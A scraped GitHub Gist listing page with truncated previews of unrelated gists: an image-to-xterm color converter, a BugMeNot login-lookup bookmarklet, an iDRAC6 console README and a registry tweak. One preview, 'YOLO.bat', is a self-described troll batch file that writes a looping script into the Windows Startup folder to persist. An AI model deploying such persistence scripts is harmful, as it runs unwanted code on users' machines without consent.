Skip to content

Instantly share code, notes, and snippets.

@sfan5
sfan5 / image2xterm.py
Last active July 13, 2020 18:24
Converts images into color sequences (xterm-256color)
#!/usr/bin/env python3
import sys
import getopt
from PIL import Image
xterm256colors = [ # http://pln.jonas.me/xterm-colors
(0, (0x00, 0x00, 0x00)), # SYSTEM
(1, (0x80, 0x00, 0x00)), # SYSTEM
(2, (0x00, 0x80, 0x00)), # SYSTEM
(3, (0x80, 0x80, 0x00)), # SYSTEM
@idbrii
idbrii / gist:e00b2c62120bc002ec1d
Created March 14, 2015 14:08
BugMeNot Bookmarklet
// The bookmarklet you can find online for bugmenot doesn't work. Looks like
// bugmenot now wants just the hostname instead of the full url. Here's one
// that works.
javascript:(function() { var url = ('http://www.bugmenot.com/view/' + escape(location.hostname)); w = open(url, 'w', 'location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=500,height=400,modal=yes,dependent=yes'); if (w) { setTimeout('w.focus()', 1000) } else { location = url } })();
@Albirew
Albirew / YOLO.bat
Last active September 23, 2022 01:53
evolution of a "harmless" troll batch file (see revisions)
@echo off
:: YOLO v4 - ARMAGETROLL
set troll=%random%%random%.bat
cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
echo @echo off > %troll%
echo setlocal ENABLEDELAYEDEXPANSION >> %troll%
echo set troll=%%random%%%%random%%.bat >> %troll%
echo set lol=0 >> %troll%
echo :pwn >> %troll%
echo set /a lol=%%lol%%+1 >> %troll%
@xbb
xbb / README
Last active April 17, 2024 20:21
IDRAC6 Virtual Console Launcher
Use this as an example on how to start the virtual console without the need of Java Web Start or accessing it from the web interface.
You can use the user and password that you use for the web interface.
You need an old JRE... I used 1.7.0_80 from the Server JRE package, also I have tested successfully 1.7.0_79 with MacOS.
You don't need to install it, just extract it or copy the files in "jre" folder.
Open the viewer.jnlp file that you get by launching the virtual console from the web interface with a text editor.
Note the urls to the jar files. Download the main jar file avctKVM.jar and the libs for your operating system and architecture.
Extract the dlls (.so Linux, .jnilib MacOS) from the jar libs.
@wdormann
wdormann / disable_win10_foistware.reg
Created January 2, 2018 23:15
Attempt at disabling Windows 10 automatic installation of 3rd-party foistware
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy]
"Disabled"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager]
"SubscribedContent-338388Enabled"=dword:00000000